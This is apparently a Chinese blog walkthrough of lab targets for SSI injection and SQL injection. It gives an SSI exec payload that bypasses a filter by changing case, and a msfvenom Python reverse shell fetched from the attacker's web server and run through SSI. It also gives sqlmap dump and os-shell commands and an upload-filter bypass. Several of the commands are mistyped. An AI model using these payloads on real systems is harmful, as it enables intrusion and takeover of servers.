靶场

SSI注入

SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。
如果在网站目录中发现了 .stm, .shtm  .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。

过程:

打开我们的kali攻击机和靶场

老套路终端ifconfig查看攻击机ip   nmap扫描出靶场ip

dirb探测靶场 看到出来很多链接 我们都打开试一下 看有没有有用信息

在robots里边有隐藏信息 打开隐藏信息 发现有两个文件 下载打开 里边说明了靶场的一些信息

然后打开ssi 是一堆文字 而且返回了攻击机的ip 可能是一个ssi注入的靶场

然后我们打开index 发现有一条指令 可能用得到 先保存下来

打开靶场ip 看到下边有让登录的地方 输入我们刚才得到的指令 发现前边的exec被过滤掉了 修改大小写发现可以绕过过滤

但是还是没有登录成功 在pass指令前加一个! 登录成功 并且看到了返回的文字

回到我们的终端 在桌面制作shell 并且启动监听 设置端口值 并且查看

下图是命令 但是我用的是python所以命令应该是

msfvenom -p python/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.py

再回到登录界面 上传shell 反弹shell

但是要从攻击机下载shell,就要把shell.py(我是用的python制作的shell)移动(mv)到 /var/www/html/ 目录下,然后开启apache服务

service apache2 start ,

查看apache状态 service apache2 status  

新开一个终端 命令如下

回到网页界面

上传shell命令<!--#EXEC cmd="http://192.168.0.118/shell.py" -->

然后还要赋予shell.php权限 chomd 777 shell.php<!--#EXEC cmd="chmod 777/shell.py" -->

然后用python运行<!--#EXEC cmd="python shell.py" -->

这下再登录就可以收到反弹的shell啦

然后

sysinfo  查看系统信息
shell 进入系统shell

优化终端 python –c ‘import pty;pty.spawn(“/bin/bash”)’

最后提权 获得flag

然后这些都是HTTP服务里边的 但是有几个靶场做不了 但是注入都是通过注入漏洞 获得可以登录的用户名和密码

上传shell 返回shell 提权 获得flag

SQL注入get参数

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。。
SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。

主要是通过sql注入漏洞,获取对应的用户名和密码,登录系统后台,寻找上传点上传shell,执行shell并返还shell给攻击机,最终取得flag值。

但是这道题需要用到web漏洞扫描器 owasp-zap

针对web进行漏洞扫描

对扫描的结果进行分析。注意:如果具有SQL注入漏洞,可以直接利用。毕竟SQL注入是高危漏洞,可以直接获取服务器权限。

这道题通过80端口找到一个登录界面,以及可以被sqlmap简单扫到的界面,登录之后看到文件上传漏洞,

<使用sqlmap利用SQL注入漏洞

--  sqlmap -u url –dbs    查看数据库名
--  sqlmap -u url –D “数据库名” –tables    查看对应数据库中的数据表
--  sqlmap -u url –D “数据库名” –T “表名” –columns  查看对应字段
--  sqlmap -u url –D “数据库名” –T “表名”-C “列名” –dump   查看对应字段的值
也可以直接尝试 sqlmap –u url –os-shell  直接获取shell>

用msfvenom生成shell,用把后缀的.php改成.PHP绕过过滤机制 可以上传shell,然后msfconsole监听对应端口,执行并返回shell

提权 获得flag

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值